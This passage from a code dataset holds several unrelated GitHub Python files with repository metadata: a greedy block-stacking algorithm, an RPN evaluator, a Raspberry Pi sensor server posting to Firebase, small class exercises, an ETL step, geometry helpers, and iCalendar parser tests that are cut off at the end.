compile_all_clips_in_dir('C:/Users/Brandon/Documents/Personal_Projects/reddit_comp/old', 'tttest_output.mp4' ) # OUTPUT_VID_FILE_PATH\n file_path_l = ['C:/Users/Brandon/Documents/Personal_Projects/reddit_comp/current_data/downloaded_clips/post_0001.mp4',\n 'C:/Users/Brandon/Documents/Personal_Projects/reddit_comp/current_data/downloaded_clips/post_0007.mp4']\n# compile_clips(file_path_l, 'test_output.mp4')\n# file_system_utils.copy_files_to_dest(file_path_l, 'current_data/test_copy')\n# resize_vid(file_path_l[1], 640)\n# resize_all_vids_in_dir(720, CLIPS_TO_COMPILE_DIR_PATH)\n\n clips_dir_path = 'C:/Users/Brandon/Documents/Personal_Projects/vid_m_comp_big_data/vids'\n# tallest_vid_height = get_height_of_tallest_vid_in_dir(clips_dir_path)\n# print('tallest_vid_height: ', tallest_vid_height)\n# output_vid_dims = smallest_working_dims(tallest_vid_height)\n# print('in comile main test, about to resize all vids in dir to dims: ', output_vid_dims)\n# resize_all_vids_in_dir(output_vid_dims, clips_dir_path)\n\n\n compile_all_clips_in_dir(clips_dir_path, clips_dir_path + '/big_vid.mp4')\n print('Test Compile Time: ', time.time() - start_time)\n\n\n print('done')\n\n\n\n","repo_name":"Brandon-Valley/vid_m_comp","sub_path":"compile_clips.py","file_name":"compile_clips.py","file_ext":"py","file_size_in_byte":22190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41838095240","text":"import sys\nimport os\nimport time\nfrom operator import attrgetter\n\n\npath = sys.argv[1]\nblocAffiche = sys.argv[2]\ntimer = sys.argv[3]\nstart = 0\nstop = 0\n\n\nclass bloc:\n _longeur = 0\n _profondeur = 0\n _hauteur = 0\n _aire = 0\n\n def __init__(self, longeur, profondeur, hauteur,aire):\n self._longeur = longeur\n self._profondeur = profondeur\n self._hauteur = hauteur\n self._aire = aire\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n \n blocs = []\n blocsTries = []\n blocSolutions = []\n currentLongeur = 0\n currentProfondeur = 0\n hauteurPile = 0\n\n #Convertir chaque ligne du fichier texte en objet bloc\n with open(path, \"r\") as file:\n for line in file:\n currentLine = line.split()\n\n # conversion en objet\n currentBloc = bloc(int(currentLine[0]),int(currentLine[1]), int(currentLine[2]), int(currentLine[0]) * int(currentLine[1]))\n\n blocs.append(currentBloc)\n\n\n if(timer == \"true\"):\n start = time.perf_counter()\n ################################################################################\n\n #On trie les blocs selon l'aire\n blocsTries = sorted(blocs, key=attrgetter('_aire'), reverse = True)\n\n # traitement du premier bloc\n blocSolutions.append(blocsTries[0])\n currentLongeur = blocSolutions[0]._longeur\n currentProfondeur= blocSolutions[0]._profondeur\n hauteurPile = blocSolutions[0]._hauteur\n\n #Etape 3: Ajout des blocs dans l'ensemble solution\n for bloc in blocsTries:\n #on ajoute les blocs strictement plus petit dans l'ensemble solution\n if((bloc._longeur < currentLongeur) and (bloc._profondeur < currentProfondeur)) :\n currentLongeur = bloc._longeur\n currentProfondeur = bloc._profondeur\n blocSolutions.append(bloc)\n hauteurPile += bloc._hauteur\n\n #arret du compteur\n stop = time.perf_counter()\n\n\n\n################################################################################\n\n #sortie de la solution\n\n index=0\n\n myRange = (range(0, len(blocSolutions)))\n if (blocAffiche == \"true\"):\n for i in myRange :\n index = index+1\n print(blocSolutions[i]._hauteur, \" \", 
blocSolutions[i]._longeur, \" \", blocSolutions[i]._profondeur)\n #print(hauteurPile)\nif(timer == \"true\"):\n print((stop - start)*1000)","repo_name":"thierlarouche/INF8775-TP2","sub_path":"src/glouton.py","file_name":"glouton.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35818819518","text":"\"\"\"\nEvaluate the value of an arithmetic expression in Reverse Polish Notation.\n\nValid operators are +, -, *, /. Each operand may be an integer or another expression.\n\nNote:\n\nDivision between two integers should truncate toward zero.\nThe given RPN expression is always valid. That means the expression would always evaluate to a result and there won't be any divide by zero operation.\nExample 1:\n\nInput: [\"2\", \"1\", \"+\", \"3\", \"*\"]\nOutput: 9\nExplanation: ((2 + 1) * 3) = 9\nExample 2:\n\nInput: [\"4\", \"13\", \"5\", \"/\", \"+\"]\nOutput: 6\nExplanation: (4 + (13 / 5)) = 6\nExample 3:\n\nInput: [\"10\", \"6\", \"9\", \"3\", \"+\", \"-11\", \"*\", \"/\", \"*\", \"17\", \"+\", \"5\", \"+\"]\nOutput: 22\nExplanation: \n ((10 * (6 / ((9 + 3) * -11))) + 17) + 5\n= ((10 * (6 / (12 * -11))) + 17) + 5\n= ((10 * (6 / -132)) + 17) + 5\n= ((10 * 0) + 17) + 5\n= (0 + 17) + 5\n= 17 + 5\n= 22\n\"\"\"\n\n\nclass Solution:\n def evalRPN(self, tokens: List[str]) -> int:\n if not tokens or len(tokens) == 0:\n return 0\n\n stack = []\n for t in tokens:\n if t in ['+', '-', '*', '/']:\n num2 = stack.pop()\n num1 = stack.pop()\n stack.append(self.operate(num1, num2, t))\n else:\n stack.append(int(t))\n return stack.pop()\n\n def operate(self, num1, num2, operator):\n if operator == '+':\n return num1+num2\n if operator == '-':\n return num1-num2\n if operator == '*':\n return num1*num2\n if operator == '/':\n return int(num1/num2)\n","repo_name":"wenyaowu/leetcode-js","sub_path":"problems/evaluateReversePolishNotation.py","file_name":"evaluateReversePolishNotation.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31381815157","text":"#!/usr/bin/env python\n\nfrom BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer\nimport RPi.GPIO as GPIO\nfrom firebase import firebase\nimport time\nimport os\nimport serial\nimport SocketServer\nimport json\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\nGPIO.setup(37,GPIO.IN)\n\nfirebase = firebase.FirebaseApplication('https://chat-9910d.firebaseio.com/')\nReceive_serial = serial.Serial('/dev/ttyACM0', 9600)\n\nclass S(BaseHTTPRequestHandler):\n #def __init__(self, args):\n # pass\n \n def _set_headers(self):\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n def do_GET(self):\n self._set_headers()\n self.wfile.write(\"Flavio Bergamini\")\n\n def do_HEAD(self):\n self._set_headers()\n\n def fire(self, data, send):\n if data == 1:\n firebase.delete('/tasks/umidadeM', None)\n send = firebase.post('/tasks/umidadeM', send)\n elif data == 2:\n firebase.delete('/tasks/acidezM', None)\n send = firebase.post('/tasks/acidezM', send)\n else:\n print(\"Sensor invalido\")\n \n def do_POST(self):\n global content_length\n global data\n content_length = int(self.headers['Content-Length']) # <--- Gets the size of data\n post_data = self.rfile.read(content_length) # <--- Gets the data itself\n \n print(type(post_data))\n print(post_data)\n if post_data == '1.00' or post_data == '2.00':\n post_data = 
float(post_data)\n            post_data = int(post_data)\n            print(type(post_data))\n            print(post_data)\n            data = post_data\n            print(\"entrou\")\n        else:\n            try:\n                self.fire(data, post_data)\n            except:\n                print(\"Mensagem invalida para ser enviada ao Firebase\")\n        \n        self._set_headers()\n        self.wfile.write(\"POST!
\")\n serialAT()\n \ndef serialAT():\n print('serial')\n Receive_serial.write('1')\n send = Receive_serial.readline()\n print(send)\n send = send.replace('\\r\\n','')\n firebase.delete('/tasks/umidade', None)\n send = firebase.post('/tasks/umidade', send)\n \n data = Receive_serial.write('2')\n send = Receive_serial.readline()\n print(send)\n send = send.replace('\\r\\n','')\n firebase.delete('/tasks/acidez', None)\n send = firebase.post('/tasks/acidez', send)\n\n Receive_serial.write('3')\n send = Receive_serial.readline()\n print(send)\n send = send.replace('\\r\\n','')\n firebase.delete('/tasks/temp', None)\n send = firebase.post('/tasks/temp', send)\n \n data = Receive_serial.write('4')\n send = Receive_serial.readline()\n print(send)\n send = send.replace('\\r\\n','')\n firebase.delete('/tasks/pluv', None)\n send = firebase.post('/tasks/pluv', send)\n\n if GPIO.RISING:\n firebase.delete('/tasks/bateria', None)\n send = firebase.post('/tasks/bateria', 'Bateia fraca')\n\n\ndef run(server_class=HTTPServer, handler_class=S, port=80):\n server_address = ('', port)\n httpd = server_class(server_address, handler_class)\n print ('Starting httpd...')\n \n #receive = firebase.get('/tasks/Station', None)\n #receive = str(receive)\n #print(type(receive))\n #print(receive)\n #size = int(len(receive))\n #print(size)\n #receive_process = receive[(size-6):(size-3)]\n #print(receive_process)\n\n #receiveM = firebase.get('/tasks/Module', None)\n #receiveM = str(receiveM)\n #print(type(receiveM))\n #print(receiveM)\n #size = int(len(receiveM))\n #print(size)\n #receiveM_process = receiveM[(size-6):(size-3)]\n #print(receiveM_process)\n #--parce = json.loads(receive)\n #--print(parce[\"taskS\"])\n\n #Receive_serial.flushInput()\n #Receive_serial.flushOutput()\n \n #Receive_serial.write('t')\n #ser = Receive_serial.readline()\n #print('---------------------------')\n #print(ser)\n #size = int(len(ser))\n #ser = ser[0:(size-2)]\n #firebase.delete('/tasks/temp', None)\n #send = firebase.post('/tasks/temp', ser)\n #print('---------------------------')\n\n #Receive_serial.write('a')\n #ser = Receive_serial.readline()\n #print('---------------------------')\n #print(ser)\n #size = int(len(ser))\n #ser = ser[0:(size-2)]\n #firebase.delete('/tasks/acidez', None)\n #send = firebase.post('/tasks/acidez', ser)\n #print('---------------------------')\n\n #Receive_serial.write('u')\n #ser = Receive_serial.readline()\n #print('---------------------------')\n #print(ser)\n #size = int(len(ser))\n #ser = ser[0:(size-2)]\n #firebase.delete('/tasks/umidade', None)\n #send = firebase.post('/tasks/umidade', ser)\n #print('---------------------------')\n httpd.serve_forever()\n GPIO.add_event_detect(37, GPIO.RISING, callback=serialAT, bouncetime=50)\n \n \n\nif __name__ == \"__main__\":\n from sys import argv\n if len(argv) == 2:\n run(port=int(argv[1]))\n else:\n run()\n","repo_name":"flaviobergamini/Server_HTTP_Firebase_Station","sub_path":"HTTP.py","file_name":"HTTP.py","file_ext":"py","file_size_in_byte":5045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21591578989","text":"class CarFactory:\n model = 'UAZ'\n common_price = 650000\n\n def build(self, count=1):\n cars = []\n\n for x in range(count):\n cars.append(\n Car(self.model, self.common_price)\n )\n\n return cars\n\n\nclass CarStock:\n max_count: int\n cars: list\n\n\n def __init__(self, count=0):\n self.max_count = count\n self.cars = []\n\n def store(self, cars: list):\n # проверять self.max_count 
(cars)\n if len(self.cars) >= self.max_count:\n raise CapacityExeption(len(self.cars), len(self.cars) + len(cars))\n elif len(cars) > (self.max_count - len(self.cars)):\n raise CapacityExeption(self.max_count, len(self.cars) + len(cars))\n\n self.cars.extend(cars)\n\nclass CapacityExeption(Exception):\n def __init__(self, current, needle):\n self.current = current\n self.needle = needle\n\n def __str__(self):\n return f\"Не достаточно места на складе. Фактически = {self.current}, необходимо = {self.needle}\"\n\n\n\n\nclass NotEnMoneyExeption(Exception):\n def __init__(self, current, needle):\n self.current = current\n self.needle = needle\n\n def __str__(self):\n return f\"Не достаточно денег. Наличных = {self.current}, необходимо = {self.needle}\"\n\n\nclass Car:\n medel: str\n price: int\n\n def __init__(self, medel, price):\n self.medel = medel\n self.price = price\n\n\nclass Custome:\n money: int\n\n def __init__(self, money):\n self.money = money\n\n def buy(self, car: Car):\n # проверять текущий баланс\n if car.price > self.money:\n raise NotEnMoneyExeption(self.money, car.price)\n self.money -= car.price\n\n#Создаем завод\nfactory = CarFactory()\n\ntry:\n #Создаем склад\n stock = CarStock(1)\nexcept CapacityExeption as exeptionStore:\n print(f\"\")\n#покупатель с деньгами\ndim = Custome(100000)\n\n#создаем определенное количество автомобилей на заводе\ncar_list = factory.build(4)\n#разместим машины в магазине\nstock.store(car_list)\n\ntry:\n #покопаем авто\n dim.buy(stock.cars[1])\nexcept NotEnMoneyExeption as exception:\n print(f\"для покупки вам не хватает - {exception.needle - exception.current} руб\")\n\nprint(dim.money)","repo_name":"Neodim5/GeekPython","sub_path":"lesson8/test/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69800260251","text":"class mapNode:\r\n def __init__(self, key, value):\r\n self.key = key\r\n self.value = value\r\n self.next = None\r\n\r\nclass map:\r\n def __init__(self):\r\n self.bucketSize = 20\r\n self.buckets = [None for i in range(self.bucketSize)]\r\n self.count = 0\r\n\r\n def getIndex(self, hashCode):\r\n return hashCode % 20\r\n\r\n def insert(self, key, value):\r\n hashCode = hash(key)\r\n index = self.getIndex(hashCode)\r\n head = self.buckets[index]\r\n while head is not None:\r\n if head.key == key:\r\n head.value = value\r\n return\r\n head = head.next\r\n head = self.buckets[index]\r\n newNode = mapNode(key, value)\r\n self.buckets[index] = newNode\r\n newNode.next = head\r\n self.count += 1","repo_name":"arnab0000/CodingNinjas-DS","sub_path":"1_numpy/hashing.py","file_name":"hashing.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21512557363","text":"from utils.trusted_area_etl_plugin import *\nfrom utils.logger import config_log\n\nLOG = config_log()\n\ndef orders_dataset():\n '''\n This function will read order, status, restaurant and consumer dataframs from RAW area.\n This function will do transformations, and write the final result to Trusted area.\n '''\n order = get_order()\n status = get_status()\n restaurant = get_restaurant()\n consumer = get_consumer()\n last_status = get_last_status(status)\n LOG.info(f\"Merging dataframes\")\n order = order.merge(last_status, how='left', on='order_id')\n order = order.merge(restaurant, how='left', on='merchant_id')\n order = order.merge(consumer, 
how='left', on='customer_id')\n order = update_local_date(order, ['AM','RR','RO','MT','MS'], td(hours=1))\n order = update_local_date(order, ['AC'], td(hours=2))\n anonymize_columns(order, ['customer_name', 'customer_phone_number', 'cpf', 'delivery_address_latitude', 'delivery_address_longitude', 'delivery_address_zip_code'])\n write_dataset_with_partition(order, 'order_local_created_at', 'orders')\n\nif __name__=='__main__':\n LOG.info(f\"Starting to create orders_dataset\")\n orders_dataset()\n","repo_name":"PedroAugustoAlvesNunes/ifood_DArch_case","sub_path":"create_orders.py","file_name":"create_orders.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42456760173","text":"import math\n\nINVALID_DISTANCE = -1\n\ndef distance(p1, p2):\n dx = p1[0]-p2[0]\n dy = p1[1]-p2[1]\n return math.sqrt(dx*dx + dy*dy)\n\n\ndef lineOffsetWithMinimumDistanceToPoint(point, line_start, line_end, perpendicular=False):\n \"\"\"Return the offset from line (line_start, line_end) where the distance to\n point is minimal\"\"\"\n p = point\n p1 = line_start\n p2 = line_end\n l = distance(p1, p2)\n u = (((p[0] - p1[0]) * (p2[0] - p1[0])) + ((p[1] - p1[1]) * (p2[1] - p1[1]))) / (l * l)\n if u < 0.0 or u > 1:\n if perpendicular:\n return INVALID_DISTANCE\n if u < 0:\n return 0\n return l\n return u * l\n\n\ndef polygonOffsetWithMinimumDistanceToPoint(point, polygon):\n \"\"\"Return the offset from the polygon start where the distance to point is minimal\"\"\"\n p = point\n s = polygon\n o = 0\n for i in range(0, len(s)-1):\n q = lineOffsetWithMinimumDistanceToPoint(p, s[i], s[i+1], True)\n if q!=-1:\n return o+q\n o = o + distance(s[i], s[i+1])\n return -1\n\n\ndef distancePointToLine(point, line_start, line_end, perpendicular=False):\n \"\"\"Return the minimum distance between point and the line (line_start, line_end)\"\"\"\n p1 = line_start\n p2 = line_end\n u = lineOffsetWithMinimumDistanceToPoint(point, line_start, line_end, perpendicular)\n if u == INVALID_DISTANCE: \n return INVALID_DISTANCE\n intersection = (p1[0] + u*(p2[0]-p1[0]), p1[1] + u*(p2[1]-p1[1]))\n return distance(point, intersection)\n\n\ndef distancePointToPolygon(point, polygon, perpendicular=True):\n \"\"\"Return the minimum distance between point and polygon\"\"\"\n p = point\n s = polygon\n minDist = None\n for i in range(0, len(s)-1):\n dist = distancePointToLine(p, s[i], s[i+1], perpendicular)\n if dist != INVALID_DISTANCE:\n if minDist is None or dist < minDist:\n minDist = dist\n if minDist is not None:\n return minDist\n else:\n return INVALID_DISTANCE\n\n\n","repo_name":"intrig-unicamp/mininet-wifi","sub_path":"mn_wifi/sumo/sumolib/geomhelper.py","file_name":"geomhelper.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":391,"dataset":"github-code","pt":"32"} +{"seq_id":"26268525878","text":"import unittest\nimport datetime\nimport cal\n\ndef tzdetails_from_dict(values):\n tzdetails = cal.TZDetails(values['kind'])\n tzdetails.name = values['name']\n tzdetails.parseline('DTSTART:%s' % values['start'])\n tzdetails.parseline('TZOFFSETFROM:%s' % values['offsetfrom'])\n tzdetails.parseline('TZOFFSETTO:%s' % values['offsetto'])\n return tzdetails\n\ndef create_parametrized_value(params, value):\n parametrized = cal.ParametrizedValue('')\n parametrized.params = params\n parametrized.value = value\n return parametrized\n\ndef create_email(ical):\n mail = '\\r\\n'.join(['Mime-Version: 
1.0',\n 'X-Mailer: GroupWise 2012',\n 'Subject: Title',\n 'Date: Wed, 15 Jan 2014 14:46:00 +0000',\n 'Message-ID: ',\n 'From: \"Joe Hacker\" ',\n 'To: Bob Hacker ',\n 'Content-Type: text/calendar',\n '',\n ical])\n return mail\n\ndef load_from_file(path):\n fdescr = open(path, 'r')\n content = fdescr.read()\n fdescr.close()\n return content\n\nclass CalendarTest(unittest.TestCase):\n\n def test_timezone_utcoffset(self):\n tz = cal.Timezone()\n tz.tzid = 'Some id'\n tz.changes = [ tzdetails_from_dict({'kind': 'DAYLIGHT', 'name': 'CEST',\n 'start': '20130331T020000', 'offsetfrom': '+0100',\n 'offsetto': '+0200'}),\n tzdetails_from_dict({'kind': 'STANDARD', 'name': 'CET',\n 'start': '20131027T030000', 'offsetfrom': '+0200',\n 'offsetto': '+0100'}) ]\n dt = datetime.datetime(2013, 10, 8, 13, 0, 0)\n utc = dt - tz.utcoffset(dt)\n self.assertEqual(utc.strftime('%Y%m%dT%H%M%SZ'), '20131008T110000Z')\n\n def test_parse_vtimezone_simple(self):\n data = ['TZID:/freeassociation.sourceforge.net/Tzfile/Europe/Paris',\n 'X-LIC-LOCATION:Europe/Paris',\n 'BEGIN:DAYLIGHT',\n 'TZNAME:CEST',\n 'DTSTART:20130331T020000',\n 'TZOFFSETFROM:+0100',\n 'TZOFFSETTO:+0200',\n 'END:DAYLIGHT',\n 'BEGIN:STANDARD',\n 'TZNAME:CET',\n 'DTSTART:20131027T030000',\n 'TZOFFSETFROM:+0200',\n 'TZOFFSETTO:+0100',\n 'END:STANDARD']\n\n tz = cal.Timezone()\n for line in data:\n tz.parseline(line)\n\n expected_changes = [ tzdetails_from_dict({'kind': 'DAYLIGHT', 'name': 'CEST',\n 'start': '20130331T020000', 'offsetfrom': '+0100',\n 'offsetto': '+0200'}),\n tzdetails_from_dict({'kind': 'STANDARD', 'name': 'CET',\n 'start': '20131027T030000', 'offsetfrom': '+0200',\n 'offsetto': '+0100'}) ]\n self.assertEqual(tz.changes, expected_changes)\n self.assertEqual(tz.tzid, '/freeassociation.sourceforge.net/Tzfile/Europe/Paris'.lower())\n\n def test_timezone_rrule(self):\n data = ['TZID:Mountain Standard Time',\n 'BEGIN:STANDARD',\n 'TZOFFSETFROM:-0600',\n 'TZOFFSETTO:-0700',\n 'DTSTART:20001102T020000',\n 'RRULE:FREQ=YEARLY;BYDAY=1SU;BYMONTH=11',\n 'TZNAME:Mountain Standard Time',\n 'END:STANDARD',\n 'BEGIN:DAYLIGHT',\n 'TZOFFSETFROM:-0700',\n 'TZOFFSETTO:-0600',\n 'DTSTART:20000309T020000',\n 'RRULE:FREQ=YEARLY;BYDAY=2SU;BYMONTH=3',\n 'TZNAME:Mountain Daylight Time',\n 'END:DAYLIGHT']\n tested = cal.Timezone()\n for line in data:\n tested.parseline(line)\n\n # Test winter offset\n actual = tested.utcoffset(datetime.datetime(2014, 1, 21, 9, 0, 0))\n self.assertEqual(actual, datetime.timedelta(hours=-7))\n\n # Test summer offset\n actual = tested.utcoffset(datetime.datetime(2014, 6, 21, 9, 0, 0))\n self.assertEqual(actual, datetime.timedelta(hours=-6))\n\n def test_parametrized_values_equals(self):\n parametrized_values1 = [ create_parametrized_value( {'CUTYPE': 'INDIVIDUAL', 'ROLE': 'REQ-PARTICIPANT', \\\n 'PARTSTAT': 'ACCEPTED', 'RSVP': 'TRUE', \\\n 'CN': 'Joe HACKER', 'LANGUAGE': 'en'}, 'MAILTO:joe@hacker.com' ),\n create_parametrized_value( {'CUTYPE': 'INDIVIDUAL', 'ROLE': 'REQ-PARTICIPANT', \\\n 'PARTSTAT': 'NEEDS-ACTION', 'RSVP': 'TRUE', \\\n 'LANGUAGE': 'en'}, 'MAILTO:alice@hacker.com' ) ]\n parametrized_values2 = [ create_parametrized_value( {'CUTYPE': 'INDIVIDUAL', 'ROLE': 'REQ-PARTICIPANT', \\\n 'PARTSTAT': 'NEEDS-ACTION', 'RSVP': 'TRUE', \\\n 'LANGUAGE': 'en'}, 'MAILTO:alice@hacker.com' ),\n create_parametrized_value( {'CUTYPE': 'INDIVIDUAL', 'ROLE': 'REQ-PARTICIPANT', \\\n 'PARTSTAT': 'ACCEPTED', 'RSVP': 'TRUE', \\\n 'CN': 'Joe HACKER', 'LANGUAGE': 'en'}, 'MAILTO:joe@hacker.com' ) ]\n self.assertTrue( len(set(parametrized_values1) 
^ set(parametrized_values2)) == 0 )\n\n def test_parse_event(self):\n data = '\\r\\n'.join(['BEGIN:VCALENDAR',\n 'PRODID:-//Ximian//NONSGML Evolution Calendar//EN',\n 'VERSION:2.0',\n 'METHOD:REQUEST',\n 'BEGIN:VEVENT',\n 'UID:20131007T194020Z-3587-100-1732-0@laptop',\n 'DTSTAMP:20131007T194119Z',\n 'DTSTART:20131008T130000Z',\n 'DTEND:20131008T133000Z',\n 'TRANSP:OPAQUE',\n 'SEQUENCE:2',\n 'SUMMARY:test summary',\n 'LOCATION:test location',\n 'DESCRIPTION:test description',\n 'CLASS:PUBLIC',\n 'ORGANIZER;CN=Joe Hacker:MAILTO:joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=ACCEPTED;',\n ' RSVP=TRUE;CN=Joe HACKER;LANGUAGE=en:MAILTO:',\n ' joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;',\n ' RSVP=TRUE;LANGUAGE=en:MAILTO:alice@hacker.com',\n 'END:VEVENT',\n 'END:VCALENDAR'])\n parsed = cal.Calendar(create_email(data))\n\n expected_event = cal.Event(None)\n expected_event.uid = '20131007T194020Z-3587-100-1732-0@laptop'\n expected_event.dtstamp = '20131007T194119Z' # dtstamp should always be a datetime in UTC\n expected_event.dtstart = ':20131008T130000Z'\n expected_event.dtend = ':20131008T133000Z'\n expected_event.summary = 'test summary'\n expected_event.location = 'test location'\n expected_event.description = 'test description'\n expected_event.organizer = create_parametrized_value( {'CN': 'Joe Hacker' }, 'MAILTO:joe@hacker.com' )\n expected_event.attendees = [ create_parametrized_value( {'CUTYPE': 'INDIVIDUAL', 'ROLE': 'REQ-PARTICIPANT', \\\n 'PARTSTAT': 'ACCEPTED', 'RSVP': 'TRUE', \\\n 'CN': 'Joe HACKER', 'LANGUAGE': 'en'}, 'MAILTO:joe@hacker.com' ),\n create_parametrized_value( {'CUTYPE': 'INDIVIDUAL', 'ROLE': 'REQ-PARTICIPANT', \\\n 'PARTSTAT': 'NEEDS-ACTION', 'RSVP': 'TRUE', \\\n 'LANGUAGE': 'en'}, 'MAILTO:alice@hacker.com' ) ]\n self.assertEqual(parsed.events[0], expected_event)\n\n def test_parse_mail_attachement(self):\n mail = load_from_file('tests/attach.eml')\n files = {}\n def output_files(name, content):\n files[name] = content\n return 'file:///mockup/%s' % name\n\n tested = cal.Calendar(mail, output_files)\n tested_event = tested.events[0]\n\n expected_name = 'recordid/foo.txt'\n expected = create_parametrized_value({}, 'file:///mockup/%s' % expected_name)\n self.assertEqual(tested_event.attachments[0], expected)\n self.assertEqual(files[expected_name], 'some content')\n\n def test_calendar_diff_added(self):\n data_old = '\\r\\n'.join(['BEGIN:VCALENDAR',\n 'PRODID:-//Ximian//NONSGML Evolution Calendar//EN',\n 'VERSION:2.0',\n 'METHOD:REQUEST',\n 'BEGIN:VEVENT',\n 'UID:old-event-uid',\n 'DTSTAMP:20131007T194119Z',\n 'DTSTART:20131008T130000Z',\n 'DTEND:20131008T133000Z',\n 'TRANSP:OPAQUE',\n 'SEQUENCE:2',\n 'SUMMARY:test summary',\n 'LOCATION:test location',\n 'DESCRIPTION:test description',\n 'CLASS:PUBLIC',\n 'ORGANIZER;CN=Joe Hacker:MAILTO:joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=ACCEPTED;',\n ' RSVP=TRUE;CN=Joe HACKER;LANGUAGE=en:MAILTO:',\n ' joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;',\n ' RSVP=TRUE;LANGUAGE=en:MAILTO:alice@hacker.com',\n 'END:VEVENT',\n 'END:VCALENDAR'])\n old = cal.Calendar(create_email(data_old))\n\n data_new = '\\r\\n'.join(['BEGIN:VCALENDAR',\n 'PRODID:-//Ximian//NONSGML Evolution Calendar//EN',\n 'VERSION:2.0',\n 'METHOD:REQUEST',\n 'BEGIN:VEVENT',\n 'UID:old-event-uid',\n 'DTSTAMP:20131007T194119Z',\n 'DTSTART:20131008T130000Z',\n 'DTEND:20131008T133000Z',\n 'TRANSP:OPAQUE',\n 'SEQUENCE:2',\n 
'SUMMARY:test summary',\n 'LOCATION:test location',\n 'DESCRIPTION:test description',\n 'CLASS:PUBLIC',\n 'ORGANIZER;CN=Joe Hacker:MAILTO:joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=ACCEPTED;',\n ' RSVP=TRUE;CN=Joe HACKER;LANGUAGE=en:MAILTO:',\n ' joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;',\n ' RSVP=TRUE;LANGUAGE=en:MAILTO:alice@hacker.com',\n 'END:VEVENT',\n 'BEGIN:VEVENT',\n 'UID:added-event-uid',\n 'DTSTAMP:20131009T194119Z',\n 'DTSTART:20131010T130000Z',\n 'DTEND:20131010T133000Z',\n 'TRANSP:OPAQUE',\n 'SEQUENCE:2',\n 'SUMMARY:added event summary',\n 'LOCATION:added event location',\n 'DESCRIPTION:added event description',\n 'CLASS:PUBLIC',\n 'ORGANIZER;CN=Joe Hacker:MAILTO:joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;',\n ' RSVP=TRUE;LANGUAGE=en:MAILTO:bob@hacker.com',\n 'END:VEVENT',\n 'END:VCALENDAR'])\n new = cal.Calendar(create_email(data_new))\n\n (changed, removed, added, unchanged) = old.diff(new)\n\n self.assertEqual(len(changed), 0)\n self.assertEqual(len(removed), 0)\n self.assertEqual(added.keys()[0], 'added-event-uid')\n self.assertEqual(unchanged.keys()[0], 'old-event-uid')\n\n def test_calendar_diff_changed(self):\n data_old = '\\r\\n'.join(['BEGIN:VCALENDAR',\n 'PRODID:-//Ximian//NONSGML Evolution Calendar//EN',\n 'VERSION:2.0',\n 'METHOD:REQUEST',\n 'BEGIN:VEVENT',\n 'UID:changed-event-uid',\n 'DTSTAMP:20131007T194119Z',\n 'DTSTART:20131008T130000Z',\n 'DTEND:20131008T133000Z',\n 'TRANSP:OPAQUE',\n 'SEQUENCE:2',\n 'SUMMARY:test summary',\n 'LOCATION:test location',\n 'DESCRIPTION:test description',\n 'CLASS:PUBLIC',\n 'ORGANIZER;CN=Joe Hacker:MAILTO:joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=ACCEPTED;',\n ' RSVP=TRUE;CN=Joe HACKER;LANGUAGE=en:MAILTO:',\n ' joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=NEEDS-ACTION;',\n ' RSVP=TRUE;LANGUAGE=en:MAILTO:alice@hacker.com',\n 'END:VEVENT',\n 'END:VCALENDAR'])\n old = cal.Calendar(create_email(data_old))\n\n data_new = '\\r\\n'.join(['BEGIN:VCALENDAR',\n 'PRODID:-//Ximian//NONSGML Evolution Calendar//EN',\n 'VERSION:2.0',\n 'METHOD:REQUEST',\n 'BEGIN:VEVENT',\n 'UID:changed-event-uid',\n 'DTSTAMP:20131007T194119Z',\n 'DTSTART:20131008T130000Z',\n 'DTEND:20131008T133000Z',\n 'TRANSP:OPAQUE',\n 'SEQUENCE:2',\n 'SUMMARY:test summary',\n 'LOCATION:test location',\n 'DESCRIPTION:test description',\n 'CLASS:PUBLIC',\n 'ORGANIZER;CN=Joe Hacker:MAILTO:joe@hacker.com',\n 'ATTENDEE;CUTYPE=INDIVIDUAL;ROLE=REQ-PARTICIPANT;PARTSTAT=ACCEPTED;',\n ' RSVP=TRUE;CN=Bob HACKER;LANGUAGE=en:MAILTO:', # Participant changed from\n ' bob@hacker.com', # Joe to Bob\n 